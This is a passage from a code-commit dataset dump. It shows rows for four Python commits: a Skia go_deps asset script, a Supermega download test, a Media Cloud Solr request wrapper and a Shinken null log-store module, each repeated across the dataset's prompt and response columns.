commit
stringlengths 40
40
| old_file
stringlengths 4
118
| new_file
stringlengths 4
118
| old_contents
stringlengths 0
2.94k
| new_contents
stringlengths 1
4.43k
| subject
stringlengths 15
444
| message
stringlengths 16
3.45k
| lang
stringclasses 1
value | license
stringclasses 13
values | repos
stringlengths 5
43.2k
| prompt
stringlengths 17
4.58k
| response
stringlengths 1
4.43k
| prompt_tagged
stringlengths 58
4.62k
| response_tagged
stringlengths 1
4.43k
| text
stringlengths 132
7.29k
| text_tagged
stringlengths 173
7.33k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c90d7ae2a407f626342786101eed4159dfbfe730
|
infra/bots/assets/go_deps/create.py
|
infra/bots/assets/go_deps/create.py
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
# There's a broken symlink which causes a lot of problems. Create the dir it
# points to.
missing_dir = os.path.join(target_dir, 'src', 'go.chromium.org', 'luci',
'web', 'inc', 'bower_components')
os.mkdir(missing_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
|
Add missing symlink target in go_deps asset
|
[infra] Add missing symlink target in go_deps asset
Bug: skia:
Change-Id: Ic806bddcdc1130e9b96158c19dbff9e16900020c
Reviewed-on: https://skia-review.googlesource.com/157565
Reviewed-by: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Commit-Queue: Eric Boren <0e499112533c8544f0505ea0d08394fb5ad7d8fa@google.com>
|
Python
|
bsd-3-clause
|
HalCanary/skia-hc,aosp-mirror/platform_external_skia,rubenvb/skia,HalCanary/skia-hc,google/skia,rubenvb/skia,aosp-mirror/platform_external_skia,Hikari-no-Tenshi/android_external_skia,rubenvb/skia,google/skia,rubenvb/skia,HalCanary/skia-hc,aosp-mirror/platform_external_skia,google/skia,HalCanary/skia-hc,google/skia,aosp-mirror/platform_external_skia,rubenvb/skia,rubenvb/skia,HalCanary/skia-hc,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,aosp-mirror/platform_external_skia,google/skia,google/skia,google/skia,Hikari-no-Tenshi/android_external_skia,aosp-mirror/platform_external_skia,google/skia,google/skia,rubenvb/skia,HalCanary/skia-hc,Hikari-no-Tenshi/android_external_skia,Hikari-no-Tenshi/android_external_skia,Hikari-no-Tenshi/android_external_skia,HalCanary/skia-hc,HalCanary/skia-hc,rubenvb/skia,HalCanary/skia-hc,Hikari-no-Tenshi/android_external_skia,google/skia,HalCanary/skia-hc,Hikari-no-Tenshi/android_external_skia,rubenvb/skia,aosp-mirror/platform_external_skia,rubenvb/skia,aosp-mirror/platform_external_skia,Hikari-no-Tenshi/android_external_skia
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
[infra] Add missing symlink target in go_deps asset
Bug: skia:
Change-Id: Ic806bddcdc1130e9b96158c19dbff9e16900020c
Reviewed-on: https://skia-review.googlesource.com/157565
Reviewed-by: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Commit-Queue: Eric Boren <0e499112533c8544f0505ea0d08394fb5ad7d8fa@google.com>
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
# There's a broken symlink which causes a lot of problems. Create the dir it
# points to.
missing_dir = os.path.join(target_dir, 'src', 'go.chromium.org', 'luci',
'web', 'inc', 'bower_components')
os.mkdir(missing_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
|
<commit_before>#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
<commit_msg>[infra] Add missing symlink target in go_deps asset
Bug: skia:
Change-Id: Ic806bddcdc1130e9b96158c19dbff9e16900020c
Reviewed-on: https://skia-review.googlesource.com/157565
Reviewed-by: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Commit-Queue: Eric Boren <0e499112533c8544f0505ea0d08394fb5ad7d8fa@google.com><commit_after>
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
# There's a broken symlink which causes a lot of problems. Create the dir it
# points to.
missing_dir = os.path.join(target_dir, 'src', 'go.chromium.org', 'luci',
'web', 'inc', 'bower_components')
os.mkdir(missing_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
[infra] Add missing symlink target in go_deps asset
Bug: skia:
Change-Id: Ic806bddcdc1130e9b96158c19dbff9e16900020c
Reviewed-on: https://skia-review.googlesource.com/157565
Reviewed-by: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Commit-Queue: Eric Boren <0e499112533c8544f0505ea0d08394fb5ad7d8fa@google.com>#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
# There's a broken symlink which causes a lot of problems. Create the dir it
# points to.
missing_dir = os.path.join(target_dir, 'src', 'go.chromium.org', 'luci',
'web', 'inc', 'bower_components')
os.mkdir(missing_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
|
<commit_before>#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
<commit_msg>[infra] Add missing symlink target in go_deps asset
Bug: skia:
Change-Id: Ic806bddcdc1130e9b96158c19dbff9e16900020c
Reviewed-on: https://skia-review.googlesource.com/157565
Reviewed-by: Ravi Mistry <9fa2e7438b8cb730f96b74865492597170561628@google.com>
Commit-Queue: Eric Boren <0e499112533c8544f0505ea0d08394fb5ad7d8fa@google.com><commit_after>#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Create the asset."""
import argparse
import os
import subprocess
def create_asset(target_dir):
"""Create the asset."""
env = {}
env.update(os.environ)
env['GOPATH'] = target_dir
subprocess.check_call(
['go', 'get', '-u', '-t', 'go.skia.org/infra/...'],
env=env)
# There's a broken symlink which causes a lot of problems. Create the dir it
# points to.
missing_dir = os.path.join(target_dir, 'src', 'go.chromium.org', 'luci',
'web', 'inc', 'bower_components')
os.mkdir(missing_dir)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--target_dir', '-t', required=True)
args = parser.parse_args()
create_asset(args.target_dir)
if __name__ == '__main__':
main()
|
8431eaf1f7d4e966694c14be2130b91190df140e
|
supermega/tests/test_session.py
|
supermega/tests/test_session.py
|
import unittest
import hashlib
from .. import Session
class TestSession(unittest.TestCase):
def setUp(self):
self.sess = Session()
def test_public_file_download(self):
url = 'https://mega.co.nz/#!2ctGgQAI!AkJMowjRiXVcSrRLn3d-e1vl47ZxZEK0CbrHGIKFY-E'
sha256 = '9431103cb989f2913cbc503767015ca22c0ae40942932186c59ffe6d6a69830d'
hash = hashlib.sha256()
def verify_hash(file, chunks):
for chunk in chunks:
hash.update(chunk)
self.assertEqual(hash.hexdigest(), sha256)
self.sess.download(verify_hash, url)
|
Add test for downloading a public file
|
Add test for downloading a public file
|
Python
|
bsd-3-clause
|
lmb/Supermega
|
Add test for downloading a public file
|
import unittest
import hashlib
from .. import Session
class TestSession(unittest.TestCase):
def setUp(self):
self.sess = Session()
def test_public_file_download(self):
url = 'https://mega.co.nz/#!2ctGgQAI!AkJMowjRiXVcSrRLn3d-e1vl47ZxZEK0CbrHGIKFY-E'
sha256 = '9431103cb989f2913cbc503767015ca22c0ae40942932186c59ffe6d6a69830d'
hash = hashlib.sha256()
def verify_hash(file, chunks):
for chunk in chunks:
hash.update(chunk)
self.assertEqual(hash.hexdigest(), sha256)
self.sess.download(verify_hash, url)
|
<commit_before><commit_msg>Add test for downloading a public file<commit_after>
|
import unittest
import hashlib
from .. import Session
class TestSession(unittest.TestCase):
def setUp(self):
self.sess = Session()
def test_public_file_download(self):
url = 'https://mega.co.nz/#!2ctGgQAI!AkJMowjRiXVcSrRLn3d-e1vl47ZxZEK0CbrHGIKFY-E'
sha256 = '9431103cb989f2913cbc503767015ca22c0ae40942932186c59ffe6d6a69830d'
hash = hashlib.sha256()
def verify_hash(file, chunks):
for chunk in chunks:
hash.update(chunk)
self.assertEqual(hash.hexdigest(), sha256)
self.sess.download(verify_hash, url)
|
Add test for downloading a public fileimport unittest
import hashlib
from .. import Session
class TestSession(unittest.TestCase):
def setUp(self):
self.sess = Session()
def test_public_file_download(self):
url = 'https://mega.co.nz/#!2ctGgQAI!AkJMowjRiXVcSrRLn3d-e1vl47ZxZEK0CbrHGIKFY-E'
sha256 = '9431103cb989f2913cbc503767015ca22c0ae40942932186c59ffe6d6a69830d'
hash = hashlib.sha256()
def verify_hash(file, chunks):
for chunk in chunks:
hash.update(chunk)
self.assertEqual(hash.hexdigest(), sha256)
self.sess.download(verify_hash, url)
|
<commit_before><commit_msg>Add test for downloading a public file<commit_after>import unittest
import hashlib
from .. import Session
class TestSession(unittest.TestCase):
def setUp(self):
self.sess = Session()
def test_public_file_download(self):
url = 'https://mega.co.nz/#!2ctGgQAI!AkJMowjRiXVcSrRLn3d-e1vl47ZxZEK0CbrHGIKFY-E'
sha256 = '9431103cb989f2913cbc503767015ca22c0ae40942932186c59ffe6d6a69830d'
hash = hashlib.sha256()
def verify_hash(file, chunks):
for chunk in chunks:
hash.update(chunk)
self.assertEqual(hash.hexdigest(), sha256)
self.sess.download(verify_hash, url)
|
|
a38e194961f4f1d675b9e0397b0c8a5fc2500b08
|
python_scripts/mc_solr.py
|
python_scripts/mc_solr.py
|
import requests
import ipdb
import mc_config
import psycopg2
import psycopg2.extras
import time
def get_solr_location():
##TODO -- get this from the yaml file
return 'http://localhost:8983'
def get_solr_collection_url_prefix():
return get_solr_location + '/solr/collection1'
def solr_request( path, params):
url = get_solr_collection_url_prefix() + '/' + path
params['wt'] = 'json'
r = requests.get( url, params, headers = { 'Accept': 'application/json'})
data = r.json()
return data
def dataimport_command( command, params={}):
params['command'] = command
return solr_request( 'dataimport', params )
def dataimport_status():
return dataimport_command( 'status' )
def dataimport_delta_import():
params = {
'commit': 'true',
'clean': 'false',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_full_import():
params = {
'commit': 'true',
'clean': 'true',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_reload_config():
return dataimport_command( 'reload' )
|
Create a wrapper library around Solr requests.
|
Create a wrapper library around Solr requests.
|
Python
|
agpl-3.0
|
AchyuthIIIT/mediacloud,AchyuthIIIT/mediacloud,AchyuthIIIT/mediacloud,AchyuthIIIT/mediacloud,AchyuthIIIT/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,AchyuthIIIT/mediacloud,berkmancenter/mediacloud,berkmancenter/mediacloud,AchyuthIIIT/mediacloud,AchyuthIIIT/mediacloud,AchyuthIIIT/mediacloud
|
Create a wrapper library around Solr requests.
|
import requests
import ipdb
import mc_config
import psycopg2
import psycopg2.extras
import time
def get_solr_location():
##TODO -- get this from the yaml file
return 'http://localhost:8983'
def get_solr_collection_url_prefix():
return get_solr_location + '/solr/collection1'
def solr_request( path, params):
url = get_solr_collection_url_prefix() + '/' + path
params['wt'] = 'json'
r = requests.get( url, params, headers = { 'Accept': 'application/json'})
data = r.json()
return data
def dataimport_command( command, params={}):
params['command'] = command
return solr_request( 'dataimport', params )
def dataimport_status():
return dataimport_command( 'status' )
def dataimport_delta_import():
params = {
'commit': 'true',
'clean': 'false',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_full_import():
params = {
'commit': 'true',
'clean': 'true',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_reload_config():
return dataimport_command( 'reload' )
|
<commit_before><commit_msg>Create a wrapper library around Solr requests.<commit_after>
|
import requests
import ipdb
import mc_config
import psycopg2
import psycopg2.extras
import time
def get_solr_location():
##TODO -- get this from the yaml file
return 'http://localhost:8983'
def get_solr_collection_url_prefix():
return get_solr_location + '/solr/collection1'
def solr_request( path, params):
url = get_solr_collection_url_prefix() + '/' + path
params['wt'] = 'json'
r = requests.get( url, params, headers = { 'Accept': 'application/json'})
data = r.json()
return data
def dataimport_command( command, params={}):
params['command'] = command
return solr_request( 'dataimport', params )
def dataimport_status():
return dataimport_command( 'status' )
def dataimport_delta_import():
params = {
'commit': 'true',
'clean': 'false',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_full_import():
params = {
'commit': 'true',
'clean': 'true',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_reload_config():
return dataimport_command( 'reload' )
|
Create a wrapper library around Solr requests.import requests
import ipdb
import mc_config
import psycopg2
import psycopg2.extras
import time
def get_solr_location():
##TODO -- get this from the yaml file
return 'http://localhost:8983'
def get_solr_collection_url_prefix():
return get_solr_location + '/solr/collection1'
def solr_request( path, params):
url = get_solr_collection_url_prefix() + '/' + path
params['wt'] = 'json'
r = requests.get( url, params, headers = { 'Accept': 'application/json'})
data = r.json()
return data
def dataimport_command( command, params={}):
params['command'] = command
return solr_request( 'dataimport', params )
def dataimport_status():
return dataimport_command( 'status' )
def dataimport_delta_import():
params = {
'commit': 'true',
'clean': 'false',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_full_import():
params = {
'commit': 'true',
'clean': 'true',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_reload_config():
return dataimport_command( 'reload' )
|
<commit_before><commit_msg>Create a wrapper library around Solr requests.<commit_after>import requests
import ipdb
import mc_config
import psycopg2
import psycopg2.extras
import time
def get_solr_location():
##TODO -- get this from the yaml file
return 'http://localhost:8983'
def get_solr_collection_url_prefix():
return get_solr_location + '/solr/collection1'
def solr_request( path, params):
url = get_solr_collection_url_prefix() + '/' + path
params['wt'] = 'json'
r = requests.get( url, params, headers = { 'Accept': 'application/json'})
data = r.json()
return data
def dataimport_command( command, params={}):
params['command'] = command
return solr_request( 'dataimport', params )
def dataimport_status():
return dataimport_command( 'status' )
def dataimport_delta_import():
params = {
'commit': 'true',
'clean': 'false',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_full_import():
params = {
'commit': 'true',
'clean': 'true',
}
##Note: We're using the delta import through full import approach
return dataimport_command( 'full_import', params )
def dataimport_reload_config():
return dataimport_command( 'reload' )
|
|
896c287ad6a5d927febaca4fa957708f783fd51a
|
shinken/modules/logstore_null.py
|
shinken/modules/logstore_null.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
This class store log broks in a black hole
It is one possibility (!) for an exchangeable storage for log broks
"""
import os
import sys
import time
import datetime
import re
from shinken.objects.service import Service
from shinken.basemodule import BaseModule
from shinken.objects.module import Module
properties = {
'daemons': ['livestatus'],
'type': 'logstore_null',
'external': False,
'phases': ['running'],
}
# called by the plugin manager
def get_instance(plugin):
print "Get an LogStore Null module for plugin %s" % plugin.get_name()
instance = LiveStatusLogStoreNull(plugin)
return instance
class LiveStatusLogStoreNull(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.plugins = []
# Now sleep one second, so that won't get lineno collisions with the last second
time.sleep(1)
Logline.lineno = 0
def load(self, app):
self.app = app
def init(self):
pass
def open(self):
print "open LiveStatusLogStoreNull ok"
def close(self):
pass
def commit(self):
pass
def commit_and_rotate_log_db(self):
pass
def manage_log_brok(self, b):
# log brok successfully stored in the black hole
pass
def add_filter(self, operator, attribute, reference):
pass
def add_filter_and(self, andnum):
pass
def add_filter_or(self, ornum):
pass
def add_filter_not(self):
pass
def get_live_data_log(self):
"""Like get_live_data, but for log objects"""
result = []
return result
|
Add a null LogStore backend for livestatus broker
|
Add a null LogStore backend for livestatus broker
|
Python
|
agpl-3.0
|
claneys/shinken,KerkhoffTechnologies/shinken,Simage/shinken,Simage/shinken,claneys/shinken,dfranco/shinken,gst/alignak,h4wkmoon/shinken,mohierf/shinken,geektophe/shinken,KerkhoffTechnologies/shinken,geektophe/shinken,mohierf/shinken,titilambert/alignak,tal-nino/shinken,staute/shinken_package,lets-software/shinken,geektophe/shinken,h4wkmoon/shinken,lets-software/shinken,tal-nino/shinken,rednach/krill,Aimage/shinken,Aimage/shinken,naparuba/shinken,claneys/shinken,dfranco/shinken,kaji-project/shinken,h4wkmoon/shinken,xorpaul/shinken,mohierf/shinken,savoirfairelinux/shinken,ddurieux/alignak,kaji-project/shinken,claneys/shinken,naparuba/shinken,fpeyre/shinken,xorpaul/shinken,tal-nino/shinken,tal-nino/shinken,h4wkmoon/shinken,rledisez/shinken,tal-nino/shinken,lets-software/shinken,lets-software/shinken,KerkhoffTechnologies/shinken,savoirfairelinux/shinken,ddurieux/alignak,naparuba/shinken,Aimage/shinken,staute/shinken_package,geektophe/shinken,geektophe/shinken,titilambert/alignak,Simage/shinken,peeyush-tm/shinken,peeyush-tm/shinken,staute/shinken_deb,gst/alignak,Simage/shinken,KerkhoffTechnologies/shinken,savoirfairelinux/shinken,dfranco/shinken,h4wkmoon/shinken,dfranco/shinken,xorpaul/shinken,rednach/krill,tal-nino/shinken,xorpaul/shinken,kaji-project/shinken,h4wkmoon/shinken,ddurieux/alignak,Simage/shinken,staute/shinken_deb,geektophe/shinken,savoirfairelinux/shinken,dfranco/shinken,claneys/shinken,rednach/krill,lets-software/shinken,fpeyre/shinken,staute/shinken_package,peeyush-tm/shinken,xorpaul/shinken,Alignak-monitoring/alignak,rledisez/shinken,peeyush-tm/shinken,rledisez/shinken,Simage/shinken,peeyush-tm/shinken,fpeyre/shinken,staute/shinken_package,rednach/krill,kaji-project/shinken,ddurieux/alignak,staute/shinken_deb,dfranco/shinken,staute/shinken_package,fpeyre/shinken,titilambert/alignak,rledisez/shinken,kaji-project/shinken,xorpaul/shinken,ddurieux/alignak,kaji-project/shinken,staute/shinken_package,rledisez/shinken,savoirfairelinux/shinken,Aimage/shinken,KerkhoffTechnologies/shinken,mohierf/shinken,Aimage/shinken,mohierf/shinken,xorpaul/shinken,staute/shinken_deb,rledisez/shinken,titilambert/alignak,lets-software/shinken,h4wkmoon/shinken,xorpaul/shinken,naparuba/shinken,savoirfairelinux/shinken,staute/shinken_deb,mohierf/shinken,kaji-project/shinken,h4wkmoon/shinken,naparuba/shinken,gst/alignak,rednach/krill,staute/shinken_deb,claneys/shinken,Alignak-monitoring/alignak,Aimage/shinken,naparuba/shinken,peeyush-tm/shinken,fpeyre/shinken,rednach/krill,fpeyre/shinken,KerkhoffTechnologies/shinken,ddurieux/alignak,gst/alignak
|
Add a null LogStore backend for livestatus broker
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
This class store log broks in a black hole
It is one possibility (!) for an exchangeable storage for log broks
"""
import os
import sys
import time
import datetime
import re
from shinken.objects.service import Service
from shinken.basemodule import BaseModule
from shinken.objects.module import Module
properties = {
'daemons': ['livestatus'],
'type': 'logstore_null',
'external': False,
'phases': ['running'],
}
# called by the plugin manager
def get_instance(plugin):
print "Get an LogStore Null module for plugin %s" % plugin.get_name()
instance = LiveStatusLogStoreNull(plugin)
return instance
class LiveStatusLogStoreNull(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.plugins = []
# Now sleep one second, so that won't get lineno collisions with the last second
time.sleep(1)
Logline.lineno = 0
def load(self, app):
self.app = app
def init(self):
pass
def open(self):
print "open LiveStatusLogStoreNull ok"
def close(self):
pass
def commit(self):
pass
def commit_and_rotate_log_db(self):
pass
def manage_log_brok(self, b):
# log brok successfully stored in the black hole
pass
def add_filter(self, operator, attribute, reference):
pass
def add_filter_and(self, andnum):
pass
def add_filter_or(self, ornum):
pass
def add_filter_not(self):
pass
def get_live_data_log(self):
"""Like get_live_data, but for log objects"""
result = []
return result
|
<commit_before><commit_msg>Add a null LogStore backend for livestatus broker<commit_after>
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
This class store log broks in a black hole
It is one possibility (!) for an exchangeable storage for log broks
"""
import os
import sys
import time
import datetime
import re
from shinken.objects.service import Service
from shinken.basemodule import BaseModule
from shinken.objects.module import Module
properties = {
'daemons': ['livestatus'],
'type': 'logstore_null',
'external': False,
'phases': ['running'],
}
# called by the plugin manager
def get_instance(plugin):
print "Get an LogStore Null module for plugin %s" % plugin.get_name()
instance = LiveStatusLogStoreNull(plugin)
return instance
class LiveStatusLogStoreNull(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.plugins = []
# Now sleep one second, so that won't get lineno collisions with the last second
time.sleep(1)
Logline.lineno = 0
def load(self, app):
self.app = app
def init(self):
pass
def open(self):
print "open LiveStatusLogStoreNull ok"
def close(self):
pass
def commit(self):
pass
def commit_and_rotate_log_db(self):
pass
def manage_log_brok(self, b):
# log brok successfully stored in the black hole
pass
def add_filter(self, operator, attribute, reference):
pass
def add_filter_and(self, andnum):
pass
def add_filter_or(self, ornum):
pass
def add_filter_not(self):
pass
def get_live_data_log(self):
"""Like get_live_data, but for log objects"""
result = []
return result
|
Add a null LogStore backend for livestatus broker#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
This class store log broks in a black hole
It is one possibility (!) for an exchangeable storage for log broks
"""
import os
import sys
import time
import datetime
import re
from shinken.objects.service import Service
from shinken.basemodule import BaseModule
from shinken.objects.module import Module
properties = {
'daemons': ['livestatus'],
'type': 'logstore_null',
'external': False,
'phases': ['running'],
}
# called by the plugin manager
def get_instance(plugin):
print "Get an LogStore Null module for plugin %s" % plugin.get_name()
instance = LiveStatusLogStoreNull(plugin)
return instance
class LiveStatusLogStoreNull(BaseModule):
def __init__(self, modconf):
BaseModule.__init__(self, modconf)
self.plugins = []
# Now sleep one second, so that won't get lineno collisions with the last second
time.sleep(1)
Logline.lineno = 0
def load(self, app):
self.app = app
def init(self):
pass
def open(self):
print "open LiveStatusLogStoreNull ok"
def close(self):
pass
def commit(self):
pass
def commit_and_rotate_log_db(self):
pass
def manage_log_brok(self, b):
# log brok successfully stored in the black hole
pass
def add_filter(self, operator, attribute, reference):
pass
def add_filter_and(self, andnum):
pass
def add_filter_or(self, ornum):
pass
def add_filter_not(self):
pass
def get_live_data_log(self):
"""Like get_live_data, but for log objects"""
result = []
return result
|
<commit_before><commit_msg>Add a null LogStore backend for livestatus broker<commit_after>#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
"""
